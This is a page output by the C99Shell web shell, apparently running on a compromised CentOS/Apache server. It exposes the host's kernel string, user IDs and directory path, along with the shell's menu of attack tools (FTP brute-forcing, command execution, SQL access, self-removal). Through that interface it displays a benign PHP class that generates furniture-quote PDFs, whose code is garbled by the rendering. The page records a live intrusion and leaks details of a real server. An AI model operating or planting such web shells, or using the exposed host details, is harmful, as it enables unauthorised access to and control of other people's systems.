!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/site/ipanel/app/util/   drwxr-xr-x
Free 9.36 GB of 93.48 GB (10.01%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PDFOrcamento.php (2.13 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include "FPDF.php";

class 
PDFOrcamento extends FPDF {

    function 
PDF() {
        
$this->FPDF();
    }

    function 
Header() {
        global 
$title;

        
//Arial bold 15
        
$this->SetFont('Arial''B'15);
        
//Calculate width of title and position
        
$w $this->GetStringWidth($title) + 6;
//        $this->SetX((210 - $w) / 2);
        //Colors of frame, background and text
//       $this->SetDrawColor(0, 80, 180);
//        $this->SetFillColor(230, 230, 0);
//        $this->SetTextColor(220, 50, 50);
        //Thickness of frame (1 mm)
        
$this->SetLineWidth(1);
        
//Title
//        $this->Cell($w, 9, $title, 1, 1, 'C', 1);
        //Line break
        
$this->Ln(10);
    }

    function 
Footer() {
        
//Position at 1.5 cm from bottom
        
$this->SetY(-15);
        
//Arial italic 8
        
$this->SetFont('Arial''I'7);
        
//Text color in gray
        
$this->SetTextColor(127);
        
//Page number
//        $this->Cell(0, 10, 'Page ' . $this->PageNo(), 0, 0, 'C');
        
$this->Cell(1906"móveis residenciais          -           móveis para escritório           -           orçamento válido por 15 dias"10'C'1);
    }

    function 
ChapterTitle($num$label) {
        
//Arial 12
        
$this->SetFont('Arial'''12);
        
//Background color
        
$this->SetFillColor(200220255);
        
//Title
        
$this->Cell(06"Chapter $num : $label"01'L'1);
        
//Line break
        
$this->Ln(4);
    }

    function 
ChapterBody($file) {
        
//Read text file
        
$f fopen($file'r');
        
$txt fread($ffilesize($file));
        
fclose($f);
        
//Times 12
        
$this->SetFont('Times'''12);
        
//Output justified text
        
$this->MultiCell(05$txt);
        
//Line break
        
$this->Ln();
        
//Mention in italics
        
$this->SetFont('''I');
        
$this->Cell(05'(end of excerpt)');
    }

    function 
PrintChapter($num$title$file) {
        
$this->AddPage();
        
$this->ChapterTitle($num$title);
        
$this->ChapterBody($file);
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0055 ]--